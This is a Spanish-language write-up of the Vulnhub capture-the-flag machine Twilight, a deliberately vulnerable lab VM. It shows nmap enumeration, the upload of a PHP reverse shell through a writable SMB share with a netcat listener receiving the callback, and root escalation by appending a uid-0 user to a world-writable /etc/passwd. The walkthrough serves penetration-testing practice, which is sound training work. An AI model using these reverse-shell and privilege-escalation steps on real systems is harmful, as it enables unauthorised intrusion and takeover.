[VULNHUB] TWILIGHT

Hoy vamos a hackear la maquina de Vulnhub llamada Twilight. Podeis descargarla desde el siguiente enlace: Sunset-Twilight

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.59                                                  
       8s
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 02:19 CEST
Nmap scan report for twilight.home (192.168.1.59)
Host is up (0.00032s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
|   256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
|_  256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
25/tcp    open  smtp        Exim smtpd
| smtp-commands: twilight Hello twilight.home [192.168.1.111], SIZE 52428800, 
8BITMIME, PIPELINING, CHUNKING, PRDR, HELP, 
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP 
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root           35 Jul 16 12:21 22253251-65325.twilight
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.1.59:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 39
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, ConnectWithDatabase, 
IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, 
DontAllowDatabaseTableColumn, SupportsTransactions, InteractiveClient, 
Speaks41ProtocolNew, FoundRows, SupportsCompression, IgnoreSigpipes, 
ODBCClient, SupportsLoadDataLocal, SupportsMultipleResults, 
SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: P8cjiTFC]*X]K@, NetBIOS MAC: 
 (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: twilight
|   NetBIOS computer name: TWILIGHT\x00
|   Domain name: \x00
|   FQDN: twilight
|_  System time: 2020-07-27T16:20:15-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-27T20:20:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Tras mirar por encima todos los servicios, echamos un vistazo mas en detalle al Samba. Miramos si tiene algun carpeta que nos llame la atencion.

~ > smbclient -L 192.168.1.59
Enter WORKGROUP\sml's password: 

	Sharename       Type      Comment
	---------       ----      -------
	WRKSHARE        Disk      Workplace Share. Do not access if not an 
employee.
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
Vemos la carpeta, WRKSHARE, nos conectamos a ella.

~ > smbclient \\\\192.168.1.59\\WRKSHARE
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> 
Al hacer "dir" vemos que estamos en la raiz del sistema. Si visitamos "/var/www/html" vemos que aparecen los mismos ficheros que se muestran en el puerto 80 :) Teniendo esto en cuenta preparamos una reverse shell.

~ > cp /usr/share/webshells/php/php-reverse-shell .
~ > mv php-reverse-shell rshell.php
~ > nano rshell.php #MODIFICAMOS IP
Una vez la tenemos preparada, la subimos!

smb: \var\www\html\> put rshell.php
putting file rshell.php as \var\www\html\rshell.php (2683,0 kb/s) (average 
1085,9 kb/s)
smb: \var\www\html\>
Ponemos nc a la escucha.

~ > nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos http://192.168.1.59/rshell.php

Low Shell



~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.70] 59268
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64 GNU/Linux
 10:51:53 up 4 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@twilight:/$

Privilege Escalation


Explorando el sistema, vemos que podemos modificar el fichero /etc/passwd.

www-data@twilight:/$ ls -l /etc/passwd
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd
Vamos a agregar un usuario al fichero /etc/passwd con los privilegios de root! Para ello nos generamos un password(123) en nuestra maquina ejecutando:

~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1
Agregamos el usuario "lacashita" con privilegios de root y la password que hemos creado anteriormente al fichero /etc/passwd.

www-data@twilight:/$ echo 
"lacashita:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:ruut:/root:/bin/bash" >> 
/etc/passwd
Cambiamos de usuario!

www-data@twilight:/$ su lacashita
su lacashita
Password: 123
root@twilight:/# id
uid=0(root) gid=0(root) groups=0(root)

root.txt



root@twilight:/# cd /root
root@twilight:~# ls
root.txt
root@twilight:~# cat root.txt
(\ 
\'\ 
 \'\     __________  
 / '|   ()_________)
 \ '/    \ ~~~~~~~~ \
   \       \ ~~~~~~   \
   ==).      \__________\
  (__)       ()__________)


34d3ecb1bbd092bcb87954cee55d88d3

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@twilight:~# 

End


Y con esto ya seriamos root de la maquina